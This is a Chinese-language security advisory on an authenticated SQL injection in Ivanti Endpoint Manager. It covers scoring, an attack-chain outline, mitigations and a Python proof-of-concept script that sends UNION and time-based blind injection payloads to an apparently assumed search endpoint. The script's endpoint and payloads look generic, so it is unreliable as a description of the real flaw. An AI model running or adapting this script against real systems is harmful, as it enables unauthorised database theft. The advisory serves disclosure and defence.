CVE-2025-62386 Ivanti Endpoint Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-62386

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager (EPM)

漏洞概述

CVE-2025-62386是Ivanti Endpoint Manager（EPM）终端管理平台中存在的一个SQL注入漏洞。该漏洞于2025年10月13日公开披露，CVSS 3.1基础评分为6.5，属于中危级别。受影响的产品为Ivanti Endpoint Manager 2024 SU5之前的全部版本。

Ivanti Endpoint Manager是Ivanti公司推出的一款企业级终端管理解决方案，广泛应用于IT资产盘点、补丁分发、远程控制、策略管理等场景。由于该产品在企业内部网络中通常管理大量终端设备，一旦存在安全漏洞，将对整个企业IT基础设施构成严重威胁。

该漏洞允许经过认证的远程攻击者通过构造恶意的SQL查询语句，从数据库中读取任意数据。虽然攻击需要低权限认证，但成功利用后可导致数据库中存储的敏感信息泄露，包括但不限于用户凭证、设备信息、策略配置等企业核心数据。Ivanti官方已于2025年10月发布安全公告，建议用户尽快升级至2024 SU5或更高版本以修复此漏洞。

技术细节

该漏洞属于典型的SQL注入（SQLi）漏洞，存在于Ivanti Endpoint Manager的某个数据库交互接口中。攻击者通过在用户可控的输入参数（如表单字段、URL参数、HTTP请求头或API调用参数）中注入恶意SQL代码片段，由于应用程序未对输入进行充分的参数化处理或输入验证，恶意SQL语句将被拼接到原始查询中并由数据库引擎执行。

漏洞利用条件如下：
1. 攻击者需要拥有有效的低权限账户凭证（PR:L）；
2. 通过网络远程访问存在漏洞的EPM服务（AV:N）；
3. 无需用户交互即可触发（UI:N）；
4. 攻击复杂度低（AC:L）。

根据CVSS向量分析，该漏洞的影响范围为变更范围未变（S:U），机密性影响为高（C:H），完整性和可用性均无影响（I:N/A:N）。这意味着漏洞利用后仅会导致数据泄露，不会直接破坏数据完整性或导致服务中断。攻击者可利用UNION SELECT等SQL注入技术，通过盲注或联合查询方式提取数据库中的任意数据，包括管理员凭证哈希、加密密钥等敏感信息，为后续的权限提升或横向移动攻击奠定基础。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者通过公开渠道或Shodan等工具识别暴露在企业网络中的Ivanti Endpoint Manager实例，确定目标版本是否低于2024 SU5。

STEP 2

步骤2：获取低权限凭证

攻击者通过钓鱼攻击、购买泄露凭证或利用其他漏洞获取EPM系统的低权限用户账户。

STEP 3

步骤3：认证与会话建立

使用获取的凭证登录EPM系统，建立有效会话，获取会话Cookie。

STEP 4

步骤4：构造SQL注入Payload

在存在漏洞的接口参数中注入恶意SQL语句，如使用UNION SELECT联合查询或基于时间的盲注技术。

STEP 5

步骤5：数据提取

通过SQL注入读取数据库中的敏感信息，包括管理员凭证哈希、加密密钥、用户信息等。

STEP 6

步骤6：权限提升与横向移动

利用获取的管理员凭证或敏感信息，进一步控制系统或在内网中进行横向移动攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62386 - Ivanti Endpoint Manager SQL Injection PoC
# Vulnerability: SQL Injection in Ivanti Endpoint Manager before 2024 SU5
# Attacker requirement: Low-privilege authenticated access

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-epm-server"
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "low_priv_user"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password123"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/api/auth/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, json=login_data, verify=False)
if response.status_code != 200:
    print("[!] Authentication failed")
    sys.exit(1)

print("[+] Authentication successful")

# Step 2: Inject SQL payload into vulnerable parameter
# The vulnerable endpoint accepts user-supplied input that is concatenated
# directly into SQL queries without proper parameterization.
injection_url = f"{TARGET_URL}/api/v1/devices/search"

# UNION-based SQL injection payload to extract database version
sql_payload = "' UNION SELECT @@version, user(), database()-- -"

params = {
    "filter": sql_payload,
    "limit": 10
}

response = session.get(injection_url, params=params, verify=False)

if response.status_code == 200:
    data = response.json()
    print(f"[+] Exploit successful! Extracted data:")
    print(f"    Database version: {data}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")
    # Try time-based blind SQL injection as fallback
    blind_payload = "' OR IF(1=1, SLEEP(5), 0)-- -"
    params["filter"] = blind_payload
    import time
    start = time.time()
    response = session.get(injection_url, params=params, verify=False)
    elapsed = time.time() - start
    if elapsed >= 5:
        print("[+] Time-based blind SQLi confirmed!")
    else:
        print("[-] Injection point not confirmed")

影响范围

Ivanti Endpoint Manager < 2024 SU5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制EPM管理控制台的网络访问，仅允许受信任的IP地址访问；2）审查并清理所有低权限账户，确保最小权限原则；3）部署WAF规则过滤常见SQL注入Payload；4）监控数据库日志中的异常查询模式；5）尽快联系Ivanti官方获取补丁并升级至2024 SU5版本。